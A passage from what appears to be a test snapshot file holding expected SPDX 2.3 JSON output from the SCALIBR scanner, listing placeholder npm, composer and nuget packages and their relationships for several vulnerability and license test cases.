"NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- 
[TestPrintSPDXResults_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": 
"NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "5.9.0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@5.9.0" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": 
"NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.2", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.2" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@3.2.5" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", 
"relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", 
"referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.2", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.2" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@3.2.5" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" 
}, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": 
"PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@3.2.5" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.3.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.3.5" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", 
"relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", 
"downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@3.2.5" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.3.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.3.5" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": 
"SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "author1/mine1", "SPDXID": "SPDXRef-Package-author1-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the php/composerlock extractor from /path/to/my/first/lockfile", "licenseConcluded": 
"NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:composer/author1%2Fmine1@1.2.3" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.2", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.2" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the dotnet/pe extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:nuget/mine2@3.2.5" } ] }, { "name": "author3/mine3", "SPDXID": "SPDXRef-Package-author3-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:composer/author3%2Fmine3@0.4.1" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-author1-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-author1-mine1-", "relatedSpdxElement": "NOASSERTION", 
"relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-author3-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-author3-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "author1/mine1", "SPDXID": "SPDXRef-Package-author1-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the php/composerlock extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:composer/author1%2Fmine1@1.2.3" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.2", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", 
"filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.2" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the dotnet/pe extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:nuget/mine2@3.2.5" } ] }, { "name": "author3/mine3", "SPDXID": "SPDXRef-Package-author3-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the php/composerlock extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:composer/author3%2Fmine3@0.4.1" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-author1-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-author1-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": 
"SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-author3-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-author3-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "author1/mine1", "SPDXID": 